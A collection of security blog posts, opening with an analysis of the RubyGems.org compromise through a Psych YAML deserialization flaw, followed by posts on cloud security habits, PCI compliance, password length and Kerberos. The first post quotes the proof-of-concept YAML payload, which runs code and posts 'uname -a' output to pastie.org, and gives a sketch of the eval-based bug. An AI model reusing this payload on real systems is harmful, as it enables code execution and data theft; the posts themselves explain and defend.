RubyGems compromise analysis

Here is a quick analysis of the issue, and some thoughts on how it pertains to RightScale users. Thanks to Tony Spataro (@xegar, RightScale’s security architect) for the lion’s share of the analysis.

The Problem

A proof-of-concept (PoC) was released that exploited the recent vulnerability in the Psych YAML parser. The PoC code was uploaded to RubyGems.org, and apparently when parsing the uploaded gem, the site triggered the exploit code and sent some information to pastie.org (hence the compromise).

When looking at the exploit code, you see:

!ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection

? ! "foo\n(require 'net/http'\n\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),   {\n  'paste[authorization]' => 'burger',\n  'paste[access_key]'    => '',\n  'paste[parse_id]'      => '6',\n  'paste[body]'          => `uname -a`,\n  'paste[restricted]'    =>  '0',\n  'commit'               => 'Create Paste'\n}); @executed = true) unless @executed\n__END__\n"

And from a comment in the PoC:

… a gem that exploits a vulnerability in the Psych YAML parser, which allows the #[]= method to be called on arbitrary Objects. If the #[]= method later calls eval() with the given arguments, this allows for arbitrary execution of code.

You can specify arbitrary classes in Psych with !ruby/string and !ruby/hash declarations. When Psych parses !ruby/hash:Class, it will actually call #initialize and then call #[]= to populate the object’s fields. If that #[]= implementation later runs eval() on its arguments, the exploit fires.
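
To make the mechanism concrete, here is a minimal Ruby sketch of that class of bug. UnsafeCollection is a hypothetical stand-in, not the actual Rails class; it simply shows how a !ruby/hash tag plus a #[]= method that calls eval() turns YAML parsing into code execution. This behavior is from Psych versions of the era of the vulnerability; current Psych versions refuse such tags by default.

require 'yaml'

# Hypothetical class standing in for the vulnerable Rails collection:
# its []= setter hands attacker-controlled strings to eval().
class UnsafeCollection
  def initialize
    @routes = {}
  end

  def []=(name, definition)
    @routes[name] = eval(definition) # dangerous: never eval untrusted input
  end
end

payload = <<~YAML
  --- !ruby/hash:UnsafeCollection
  greeting: "puts 'arbitrary code ran during YAML.load'"
YAML

# On a pre-fix Psych, this builds an UnsafeCollection via #initialize and then
# calls #[]= for each key/value pair, which runs the embedded Ruby string.
YAML.load(payload)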

The Assessment

YAML can contain arbitrary Ruby objects, which is why it’s typically a bad idea to trust it blindly. YAML parsers do try to constrain the way they cause code to be called: namely, they try to stick to calling attribute getters and setters and object initializers, and nothing else. Under normal circumstances this is a reasonable way to ensure that YAML can’t run arbitrary code, only manipulate objects’ instance data. However, suppose a piece of code has an attribute setter, I call that setter and pass it a chunk of string, and that string is later evaluated as code (note: eval is a bad idea). In that case my YAML contained an object with an attribute value that gets treated as code, and bam, YAML now has arbitrary code execution.

This is what we suspect, but have not confirmed, happened in the RubyGems case: the YAML inside the PoC gem was parsed as part of the upload process, which in turn exercised the Psych vulnerability.

It appears that the other gems in the RubyGems.org world (i.e., their S3 bucket) are not affected. The RubyGems maintainers are reviewing the S3 bucket logs, which will take a bit, but per their response:

From what we know right now, no other changes on our S3 bucket have taken place, and we’re going to check the logs to make sure. Once we get a real fix for this issue out, pushing gems will be enabled again.

So, if none of your apps or libraries install a gem called “exploit”, you should be fine.

Recommendations

Here is a brief list of things I recommend you do:

  1. Install the updates as referenced in CVE-2013-0156 and CVE-2013-0155
  2. Do not load YAML you don’t trust, and if you have to, make sure you do so with extreme care (one sketch of what that can look like follows this list)
  3. Do not use any of the “exploit” PoC gems; you will be hacking yourself 😉
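
On recommendation #2, here is one hedged sketch of what “extreme care” can look like in Ruby: parse the untrusted YAML into Psych’s node tree (which creates no Ruby objects), reject any node carrying a tag, and only then convert to plain scalars, arrays, and hashes. Newer versions of Psych also ship a safe_load that is usually the simpler choice where available.

require 'yaml'

def load_untrusted_yaml(text)
  doc = YAML.parse(text)          # builds a Psych::Nodes tree; runs no object code
  doc.root.each do |node|
    raise ArgumentError, "tagged YAML node not allowed: #{node.tag}" if node.tag
  end
  doc.to_ruby                     # only plain scalars, sequences, and mappings remain
end

load_untrusted_yaml("---\nname: demo\ncount: 3\n")   # => {"name"=>"demo", "count"=>3}
load_untrusted_yaml("--- !ruby/hash:SomeClass {}")   # raises ArgumentError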

As a side note, if it had turned out that the S3 gems were compromised, those RightScale users leveraging our frozen repository feature would not have been exposed. Just another way RightScale is looking out for our users.

 

Cloud Security: The Secret Sauce

You’ve been hearing it for years, “The Cloud is insecure”; well, I am here to tell you the secret to Cloud security. Companies have paid hundreds, even millions, of dollars to try to ascertain the information in this blog, and I am offering it to you for free. You will be surprised at how secure you can make the Cloud using the secrets and tips I will share with you. Many other security folks will tell you that it is not possible; I am here to tell you it is! Using my award-winning, tried-and-tested formula for success, you can have a secure cloud as well. If you enjoy this, let me know and you’ll receive immediate access to my “Secure your enterprise in 10 easy steps”, for the low price of $11.93.

With that groundwork laid, I now present to you “Phil’s 10 secrets to guaranteed Cloud Security”. Please do not share this proprietary information with others; it has taken me years of research to identify these “secrets” and I only want my friends to benefit from that research.

Secret #1: Random selection via dart throwing doesn’t work

My research has shown that in order for you to be successful, you actually have to plan something, and then monitor to see if it worked. Yes, believe it or not, pure random security-solution dart throwing does not produce success. I know this will be a shock to many, but taking the time to identify security controls and metrics that matter to the company is key to achieving actual security.

Secret #2: Self-healing is a myth

The second item that I have uncovered is that systems become vulnerable over time, thus patching is important. I know many of you have been under the impression that systems are self-healing, and that patching is something that is left to the neophytes, but I am here to tell you that patching is important. Those self-healing tapes you have your systems listening to are not helping. Digging further into this phenomenon, I identified that you must patch both systems and applications. Imagine my surprise when I found out that applications have vulnerabilities too, and that patching them was as important as patching the systems.

Secret #3: Developers are human

Third in my “secrets to Cloud security success” is the often hidden fact that your developers are not perfect and will write vulnerable code. Much to my amazement, I was shocked to find out that developers make mistakes, and in some rare cases actually have no idea about the security requirements of the applications they are writing. To thwart this nefarious exposure, testing of application code for vulnerabilities is a must, and it is one of the closest-held secrets in the “Cloud security” community. Those of us in that community do not like to let that little secret out much. You have just been granted access to the inner circle with that tidbit.

Secret #4: Attackers have dictionaries

Those darn hackers have dictionaries too. We should not have to use things that are complicated, but that is part of the “secret sauce”: strong authentication. While I know that using your cat’s name or street name makes things much easier, it does so for the attackers as well. My #4 secret is to use some type of strong authentication or a complex (in terms of length) password. It is good to have a lockout policy as well.

Secret #5: People can see your traffic

During my early years in InfoSec, I was part of a team that would get alerts from major backbone providers if certain “traffic” matched a communication pattern. This was visible because anything that passes over the Internet is potentially subject to “sniffing” by any device on the path the packet traverses, so we need to encrypt what we put on the wire (or the air, for that matter). If you want something to be secret, you need to make sure it is not exposed. For our purposes, the “secret” here is to encrypt the transport on things you want to keep private.
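
For the code-minded, here is a trivial Ruby sketch of that “secret”: talk to a service over TLS and verify its certificate. The URL here is a placeholder, not a real endpoint.

require 'net/http'
require 'openssl'
require 'uri'

uri = URI('https://api.example.com/status')   # hypothetical service

# use_ssl turns on TLS; VERIFY_PEER makes sure we are talking to who we think we are
Net::HTTP.start(uri.host, uri.port,
                use_ssl: true,
                verify_mode: OpenSSL::SSL::VERIFY_PEER) do |http|
  response = http.get(uri.request_uri)
  puts response.code
end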

Secret #6: Your data needs protection too

Attackers will try many vectors to get at their target, and if you forget to patch a system or application and data gets compromised, having the data encrypted at rest may buy you some time. There have been multiple occasions where a system is compromised and then used to gain access to a database. If the data had been encrypted at the application layer before being placed into the database, the exposure would have been significantly reduced. Further, any time you move the data offline, having it encrypted reduces your exposure. Secret #6 says encrypt your data at rest and manage your keys properly.
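
Here is a minimal Ruby sketch of application-layer encryption using OpenSSL’s AES-256-GCM. It is an illustration only: in real life the key comes from a key-management service, never from the same database you are protecting, and the card number below is made-up example data.

require 'openssl'

# In practice, fetch this from a KMS/HSM; generating it inline is just for the sketch.
KEY = OpenSSL::Cipher.new('aes-256-gcm').random_key

def encrypt_field(plaintext)
  cipher = OpenSSL::Cipher.new('aes-256-gcm')
  cipher.encrypt
  cipher.key = KEY
  iv = cipher.random_iv                                  # unique IV per record
  ciphertext = cipher.update(plaintext) + cipher.final
  { iv: iv, tag: cipher.auth_tag, data: ciphertext }     # store all three columns
end

def decrypt_field(record)
  cipher = OpenSSL::Cipher.new('aes-256-gcm')
  cipher.decrypt
  cipher.key = KEY
  cipher.iv  = record[:iv]
  cipher.auth_tag = record[:tag]                         # GCM authenticates as well as encrypts
  cipher.update(record[:data]) + cipher.final
end

row = encrypt_field('4111-1111-1111-1111')               # example data only
puts decrypt_field(row)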

Secret #7: Things you don’t plan for happen

I have seen many occasions where supposedly “disabled” accounts were used to gain access to systems and data they should no longer have had access to. Further, there have been times where users with excessive access have fallen into the “curiosity killed the cat” trap and ventured into things they should not have. Performing reviews of who has access to what, and what level of access they have, is another “secret to success” in the Cloud security world.

Secret #8: Logs don’t review themselves

One of the most often overlooked “secrets” is watching for things that you don’t expect. You will need to implement a mechanism to actually review logs and security-related events. It doesn’t need to be sexy or expensive, but it does need to fit your specific circumstance. The one thing about attackers is that they will get sloppy and you can identify them, but if you never look, you won’t (kind of like a Yogi Berra statement).

Secret #9: What you don’t know can hurt you

Back to the things people don’t think much about: knowing the ins and outs of the development framework you choose for your application is important. Leveraging its security features can be a big win, while trying to make the framework do something it is not designed to do has the opposite result. So “secret” #9 is: train your developers in the security features of the development frameworks you use.

Secret #10: The dark side is not always bad

The final “secret” to success is to look at your organization like an attacker would. Risk assessments are a key part, but only if done in the reality of the environment. If you are too theoretical, you will get bogged down in noise. Too optimistic, and you’ll get hacked because you left things unprotected. My final word of advice is to “Think like a bad guy when doing risk assessments”.

Summary

If you follow my tips and apply these “secrets” in your organization’s use of Cloud computing, you will have a secure cloud. If you don’t, the chances of you being successful are minimal, as my system has a proven track record of success. My competitors have no such claims!

Phil “SnakeOilSecurity” Cox

Epilogue

By the way, if you have not figured out that the whole “secret sauce” and “easy steps” stuff is just a parody of the whole infomercial thing, please read it again: there is no such thing as “secret sauce” and nothing is “easy”. The things I list above are just part of an overall good security program. The reality is that you need good security hygiene, in the Cloud or not; that is what keeps you secure (or minimizes your risk), not tools or promises from others.

Phil “Just another security guy trying to do his best” Cox

Get rid of your private cloud, you don’t need it!

Well, maybe that is a bit harsh, but as I stated in my last post, I am convinced that in the future everyone will be using public cloud for the most part anyway.

I just got the latest Cloud Report and, much to my pleasure, the top story was about NASDAQ planning to use Amazon Web Services for storage of critical data. The article states (emphasis added):

Nasdaq said it’s launching a cloud-based system hosted by Amazon Web Services aimed at letting broker-dealers store critical records in order to meet compliance requirements

This step by NASDAQ is in line with what I see as the true state of cloud security: done right, it is just as good as, or better than, your current datacenter. I applaud NASDAQ’s efforts and hope that more follow suit. It is when folks break ground and make a path for others to follow that adoption rates will increase. I have attempted that with PCI in public cloud, and NASDAQ is forging ahead with truly critical financial data.

Here is to you, NASDAQ!!!!!!

Why your data will end up in a public IaaS cloud

While listening to a DevOps podcast with Simon Wardley, I heard his description of the path from evolution to dispersion. I then thought about the current biggest name in the enterprise, Microsoft, and how they are devoting a significant amount of focus to the public model (Azure, Office 365, etc.). It dawned on me that, from a backend/server standpoint, private ownership as we know it will be a thing of the past. I am not sure when, but the time is coming when most of the servers and services that run will be in what we now consider the “public” realm.

To explain a bit: I have been a private cloud fan and see value in on-premises solutions. My perspective has been a rear-view look, as that is the way I am comfortable with and know; it is NOT from peering into the future. The future for computing services, as I see it, is similar to electricity (I know this analogy has been used by many before me). Similar in that none of us has our own electricity-generating facility; we use public power. We may have generators or other backup sources of power, but everyone effectively consumes power generated by what are known as public utilities. I believe this will be the same for computing services.

Following what I took from Simon Wardley’s discussion on the DevOps podcast, I see that much will need to change to move to this commodity service standard: policies, deployment, application design, how we view security and how we implement it, etc. Effectively, the way we do and view things must change. I am convinced it will happen.

My paraphrase of Simon’s dispersion state is that once something gets there, folks neither care nor want to know what is happening under the hood. They just want what the service provides. We are starting to see this in IT. Think about it: EVERYTHING, and I mean EVERYTHING, that is innovative and has people falling all over themselves to get at it is based on ubiquitous access and effectively “public”-facing services. They are not behind walls; they are open to the public: all of Google, Microsoft’s next-gen offerings, etc.

Ultimately, a public cloud is hosted on “public” systems, thus the title of this blog. Your data will be there. So while you are spending a lot of time building the castle, keep one eye on the open space, as it is likely you will end up there at some point. Better to start thinking now about how you will embrace the change, rather than get caught up in the rush and be swept away.

I know this is short, but I thought it worth a rant. Let me know what you think.

Compliance Initiatives: The Goose that laid the golden egg

Yesterday the Open Scoping Framework Group (I am a member) released the Open PCI Scoping Toolkit. The focus of the document is to help establish consistency in the PCI scoping process, thus enabling folks to “move on” to actually getting things done. While the focus is to help, there was one thread in particular that hit a hot button for me. @attrition made the following tweet, which started the ball rolling 😉

attrition.org attritionorg
@Wh1t3Rabbit what a colossal waste of time and energy. no matter how you scope a PCI assessment, it is *always* smaller than attacker scope
8/31/12 3:00 PM

In a nutshell, the reaction was that spending any time on PCI compliance (and, by inference, any compliance) is a waste of time because “compliant” does not mean “secure”. First let me state that I agree with the premise that “compliant” does not equal “secure”. However, at the macro level my premise is that a combination of a security program and secure systems/applications will be compliant, and that compliance initiatives may be InfoSec’s best avenue to get there.

Based on that, I believe those in InfoSec who have a visceral reaction to compliance initiatives are missing their best opportunity to make real change. Why?

  1. It gets budget
  2. Secure systems are the goal
  3. It makes you do things you normally would not: documentation, process, and review

Gets Budget

We in InfoSec are always complaining about our lack of funding and looking for more money. Heck, everyone in the company thinks they don’t have enough budget, and unless you are the government, you can’t just “make” more money. Raf Los had a recent post that stated:

“Few corporate executives will argue with the attorneys, and even fewer middle-managers are willing to defy the general counsel.”

Compliance gets the attention of upper management (i.e., the business). That attention then has weight behind it, which means additional budget that you would not get without it. This fact alone should not be overlooked or quickly dismissed.

Secure Systems are the Goal

I know of no compliance framework whose original intent is “check a box”. They all started with the premise of protecting information. They might have grown into bureaucratic monstrosities that get nothing done, but at their core, they want true security. The sole purpose of the PCI DSS is to protect cardholder data, and thus limit the financial risk to the Card Brands. No more, no less. Others have hijacked it as a mechanism to line their pockets or further their careers, but at its origins, it is about secure systems and applications to prevent unauthorized access and use of credit cards.

As with all compliance initiatives (HIPAA, FISMA, SOX, etc.), the true intent is secure systems. As InfoSec we need to keep this in focus and champion that cause. If you grow weary doing that, it is not the fault of the compliance requirement.

There is nothing that prevents you from actually deploying secure systems to meet the requirement. If you do not, you need to blame something other than the compliance requirement.

Things You Should do but Don’t

One other point on this is that all compliance initiatives require some type of documentation, process, and review component. It has been my experience in my past 20+ years in InfoSec that most folks do not do these, and are mostly irritated that they are expected to. Yet they are a CRITICAL part of a successful long-term program. The current state of “documentation, process, and review” is pathetic even with the compliance requirements for it; I’d argue it would be almost nonexistent if there were no requirements.

A security program without those three “hygiene” components is bound to fail. I am glad the compliance programs force that hand.

Not a Panacea

I get it. Compliance initiatives have their problems:

  • Not all of the funds can be used to secure the systems and applications. Some will be used for auditors or other things that you may deem useless. On the other hand, having an external entity check your work is usually a good thing, so even this could be seen as a positive
  • Some folks just look for check boxes. If you’re the type of person that will just “check” a box to get it done, then you have no business in InfoSec. If the company you work for wants you to just “check” the boxes, then you need to find another company, as they are asking you to lie. The movie “Fun with Dick and Jane” always comes to mind for those types of organizations. You have to be committed to the cause and hold your ground.

So …
As you can tell, I see compliance initiatives as a net positive tool that can help me accomplish my mission of protecting the systems and applications at my company. I suggest that you use them to get traction and implement things. Nothing is perfect, but it is a start, and currently one of the few things that will get management attention in any size organization.

You have two choices: complain or use the opportunity. It is your choice. To take a biblical quote and put it into my current mindset:

“Choose you this day what you will do: either just check the boxes, or do nothing and complain; but as for me and my team, we will use compliance to help secure our systems.” (Play on Joshua 24:15)

Passwords – You are likely wrong in your recommendations

This is going to be short and to the point: if you allow passwords shorter than 11 characters, they are not strong and are subject to brute force in a relatively short period of time. Using the practical analysis of password complexity from https://www.grc.com/haystack.htm and its “massive cracking array scenario”, we have the following brute-force times (a rough reproduction of the arithmetic follows the list):

  • <11 char Upper+Lower+Num+Special = 1 week to crack
  • 11 char U+L+N+S = 1.83 years
  • 12 char U+L+N = 1 year
  • 13 char U+L = 6.59 years
  • 16 char single case = 14 years
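
If you want to sanity-check those numbers yourself, the arithmetic is simple: the search space is the sum of alphabet_size^n for every length n up to the maximum, divided by the guess rate. Here is a small Ruby sketch that roughly reproduces the bullets above, assuming GRC’s massive-cracking-array rate of one hundred trillion (1e14) guesses per second.

GUESSES_PER_SECOND = 1.0e14
SECONDS_PER_YEAR   = 365.25 * 24 * 3600

# Years to exhaust every candidate password up to `length` characters drawn
# from an alphabet of `alphabet_size` symbols.
def years_to_exhaust(alphabet_size, length)
  space = (1..length).reduce(0.0) { |sum, n| sum + alphabet_size.to_f**n }
  space / GUESSES_PER_SECOND / SECONDS_PER_YEAR
end

puts years_to_exhaust(95, 11)  # all four classes (95 printable ASCII) ~1.8 years
puts years_to_exhaust(62, 12)  # upper + lower + numeric               ~1.0 year
puts years_to_exhaust(52, 13)  # upper + lower                         ~6.5 years
puts years_to_exhaust(26, 16)  # single case                           ~14 years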

This assumes that the passwords are not guessable by a well-known search algorithm (i.e., words or “common” phrases). Based on the numbers I ran at haystack, I feel that any responsible organization should have the following minimum password standard for length and complexity (a minimal sketch of a check for this policy follows the list):

  • A minimum password length of 13 characters
  • Do not choose passwords that consist entirely of common phrases or regularly used combinations of dictionary words; the use of random word combinations is key. Avoid passwords based on repetition, dictionary words, letter or number sequences, usernames, relative or pet names, romantic links (current or past), or biographical information (e.g., ID numbers, ancestors’ names or dates)
  • Choose passwords that contain at least two character classes (Upper alphabetic, Lower alphabetic, Numeric, Non-alphanumeric symbols)
  • Avoid using the same password for multiple sites or purposes
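
As a rough illustration, here is a minimal Ruby sketch of a check for that policy. The COMMON_PASSWORDS list is a tiny stand-in for a real dictionary of common passwords and phrases.

# Hypothetical policy check: length >= 13, at least two character classes,
# and no well-known password embedded in it.
COMMON_PASSWORDS = %w[password letmein iloveyou qwerty123].freeze

def acceptable_password?(pw)
  return false if pw.length < 13
  classes  = 0
  classes += 1 if pw =~ /[A-Z]/
  classes += 1 if pw =~ /[a-z]/
  classes += 1 if pw =~ /[0-9]/
  classes += 1 if pw =~ /[^A-Za-z0-9]/
  return false if classes < 2
  return false if COMMON_PASSWORDS.any? { |c| pw.downcase.include?(c) }
  true
end

acceptable_password?("correct zebra lamp")  # => true  (18 chars, lower + space)
acceptable_password?("Password12345")       # => false (contains a common password)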

Here is a walk-through of an example:

Go to https://www.grc.com/haystack.htm

  • Enter Z2#$gY&!stw* = 1.74 centuries
  • Then enter “energy never ate flashlight” = 2.10 trillion trillion centuries

Some may say, “Well, if I tell you how the password is constructed, it doesn’t help you cut down the search time for the first, but it does significantly for the second.” To which I would answer: “Disagree. The second is a random selection of common words with a minimum length of X. The fact that #1 basically needs to be stored somewhere to be remembered is a much bigger risk.”

So, if I say my password is all lower case and 18 characters long, brute force must still search the entire lowercase space for that length; you don’t know the length of any word, as the selection is semi-random. If you use common phrases you are in trouble, but the use of random combinations is mathematically a huge haystack. I am not a mathematician, but when I see the studies on it, it makes sense. It is when folks start using common phrases or common combinations that the entropy drops significantly.

In a nutshell, I would rather have folks using a “random combo” they can remember and not have to write down or store, over the “seemingly complex” password that they will store somewhere.

This is basically what the well-known XKCD comic (https://xkcd.com/936/) said as well, but I just don’t see folks getting it.

I hope you will.

 

Kerberos for Cloud ID Federation: Why or Why Not?

During the “When IT Fails: A Novel” reviewer party at RSA Conference, I was talking with Ben Rockwood (@benr) about Cloud Identity, and mentioned that I had just written an article for Dark Reading on Cloud IdM, the issues around it, and current solutions. He asked me what they were, and I told him:

  • Identities maintained at the Cloud Provider
  • Identities maintained at the organization and then “sync’d” with the Cloud Provider
  • Identity Federation
  • Identity as a Service (IDaaS)

He promptly challenged me with “What about Kerberos?” I was taken aback a bit, then thought back (way back) to discussions (more me listening to them educate me) with Paul Hill, Dan Geer, and Jeff Schiller about Project Athena and the goal of the Kerberos portion: provide authentication between different trusting entities in a hostile networking environment (my paraphrase of the discussions). So what do I want of my Cloud IdM? Authentication of users from different trust zones across a hostile network.

So, to the question “What about Kerberos?”, I answer “NO”. I spent some time talking with my friend and Identity rockstar Paul Hill about the issue, and here are some reasons why not Kerberos:

  1. SAML has a wider privacy model. In higher education, the linkage to library providers and publishers, and the model where they need to know that you belong to a group (e.g., the University) rather than your individual identity, makes SAML a better fit. While Kerberos is working on an “anonymous” ticket, the flexibility already exists in SAML to have varying degrees of info (i.e., tailored to the application) on the subject in question.
  2. Establishing trust relationships. There is wide support for federation organizations like incommon.org (a federation of 200+ organizations supporting the establishment of SAML trust relationships), whereas Kerberos has no such support organization. While it is technically feasible to do this, no organization has stepped up to do it. The overhead of establishing trust relationships is significantly higher with Kerberos than with SAML.
  3. SAML has the ability to indicate the authentication mechanism, as well as the trust level of the identity in question. While this bleeds into the access control area, SAML can aid you in access control; Kerberos cannot.
So, in a nutshell, there is really no significant technical answer to “Why not Kerberos?”; it can do what is needed. But there are meta reasons: current adoption (e.g., VHS vs. Betamax) and flexibility.

“Scared Straight” the only hope for “entitlement” minded users

I just got done reading an article on Yahoo Finance about how young professionals and college students will go to almost any length to get Internet access, and more specifically Social Media access. I have no problem with mixing business and personal lives in a connected world. I do it all the time; it is the current trend and I don’t see it fading. The part of the article that bothered me was the following observation:

“The desire for on-demand access to information is so ingrained in the incoming generation of employees that many young professionals take extreme measures to access the Internet, even if it compromises their company or their own security.”

In reality, I don’t care about the “own security” part. They are adults and can do what they want. They can also suffer the consequences of Identity Theft or other issues. Where I have the problem is that these users are so “addicted” to connectivity that they would risk their company, and thus the livelihood of others who work for the company; that is unacceptable. To me, it shows the “entitlement mentality” and short-sighted approach to life many are developing. The simple fact that someone does not care if his actions could cause significant impact on the company he works for is telling, and the tale it tells is sad.

However, being a “fixer”, I thought, “What would it take to change that behavior?” I was brought back to a TV show I saw in my youth: Scared Straight. The show brought troubled youth face to face with hardened criminals and attempted to give them a “real” glimpse into what their future was going to be. I see the only way to reset this entitlement mentality is with a “technical scared straight”. It is important for me, as the driver of security in my company, to provide opportunities to engage those that might succumb to this “get it at any cost” mentality and show them that their actions can have real impact.

What does this mean exactly?
How does it look?

It is showing live hacks on the actions they perform. It is:

  • having a demo on hijacking a jailbroken phone and getting access to data
  • booting a laptop from USB and pulling data off an unencrypted drive
  • performing a phishing attack on their social media connection
  • etc.

You have to be imaginative and figure out what will hit those users in the proverbial nose. I want to get their attention, then finish by pointing out obvious, but maybe not so front-of-mind, facts such as:

  • if the company they work for fails, then they lose their jobs
  • if they contribute to that failure, then they have contributed to the loss of jobs for all their co-workers
  • if they contribute to that failure, then they have contributed to the loss of services to their customers

Basically, bring it home. I have found that it is usually NOT a lack of caring, but a lack of understanding, that is the reason for most of the apparent disregard for rules. For those that don’t care, even after meaningful dialogue, I say, “There is the door, have fun at your new job….”

Thoughts on CloudExpo

This was my first CloudExpo and I had very high hopes of technical sessions and opportunities to have meaningful conversations about Cloud and Security. Those hopes were quickly dashed as I sat through session after session that started with a good premise and quickly rolled into a sales pitch for the company presenting. I am not opposed to speakers promoting their product; they are taking the time to present and made the commitment, and I am OK with that. What did bother me was the implication that “their product was the only way to solve this problem”. Not all sessions were like this, but most that I attended were. It bothers me when I hear statements like:

  • “there is no such thing as Private Cloud” from a purely public cloud company
  • “those guys did crypto wrong, so we had to do it right” yet those other guys are saying the same thing about them
  • It goes on

My best experiences at the conference were my 1-on-1 discussions during breaks or at lunch. In particular, talking to Dave Asprey of Trend Micro about their Deep Security product, as well as bio-hacking (stuff for another blog). Or the lunch chat with the folks from PerspecSys. We started talking about how you protect sensitive data, which covers the typical at-rest and in-transit discussions, but when asked about “in process/memory”, they are the ONLY ones I have ever run into who had the right answer: “you can’t”, so “we do it on-premise”. They have an interesting solution, and it is worth a look if you have that stringent a security requirement. Or my breakfast with Sanket from Coupa Software, discussing security programs for SaaS-based companies and how we really get it done.

All in all, I am glad I went, because it gave me a chance to have those conversations. I hope that next time I go to a CloudExpo, or if I ever speak at one, the sessions will be more about the needs of the audience and less about the presenter’s company.

As a side note, while I don’t drink, the RightScale Cocktail party and “after” parties seemed to be a great hit, and meeting people at them was a blast as well (not from a technical standpoint, but meeting interesting folks with varied backgrounds).

 

Till next time.

Why “Just Good Enough” should be the goal

I spend a lot of time thinking about security in many different contexts. I am not sure why my mind immediately goes to “how can I break that” when I see just about anything, which leads me to see security as something people should inherently think about (and value). The reality is that I am an oddity. Most people don’t think the way I do, and more importantly they do not see the same amount of value in (i.e., they will not spend money on) the things that I would. This frustrating point got me thinking “Why?”. Why don’t people see the value and the urgency that I do in many things? Well, the simple fact is that they DO care about security; they just do not care about security itself. To me security is a hobby, something with intrinsic value for my curious mind. For most others, security is an attribute they want, but they don’t care specifically about how it happens. They want a level of security that is “just good enough”, and they are willing to pay for that, be it in a personal or professional setting.

So then I asked: if all they want is “Just Good Enough” security, what does that really mean? I went immediately to Humpty Dumpty:

“When I use a word, it means just what I choose it to mean, neither more nor less”

That is what “Just Good Enough” is: whatever you decide it to be. And I agree completely that this is the level of security you should strive for in your personal and professional life. Most will think that I am advocating “what can I get away with” security, and I am not. I am advocating that in a personal or professional setting, you should not spend a single penny more, or expend one additional minute, on security than you have to. Your goal should be security that is “Just Good Enough”. Now the kicker: how do you know what is “Just Good Enough”? Simple: “Just Good Enough” is the same as “Acceptable Risk”. You know you have hit that line when you know the true risk to whatever it is you are trying to protect, and you are at the point where you can say, “I am comfortable with the chance of the bad thing happening and not being able to prevent it.”

Let’s take a quick example. If you were going to walk down the ritzy part of Rush Street in Chicago at Christmas time, your “Just Good Enough” security for your personal safety is likely nothing more than your ability to yell for help should you need it. However, if you are walking down the main drag in Kabul, that level of “Just Good Enough” is going to be significantly different. I might add that it will be slightly different for every individual, as each of their “acceptable risk” levels will be different.

So where am I going with this? In the professional context, if you want to be successful and truly help your company, then you should understand your environment and have a goal of implementing a security level that is “Just Good Enough”. Best practices are a red herring; there is no such thing. In a tweet the other day, @e_cowperthwaite said we should use the term “standard practice” instead, and I agree. But “standard” is not always “best”. Your “best practice” will be specific to you and your environment, not to an industry.

So my point: don’t spend a cent more on security than you must. It is not about “what can I get away with” but “what is the minimum I must do”. The latter must be an educated decision, backed by those who have skin in the game.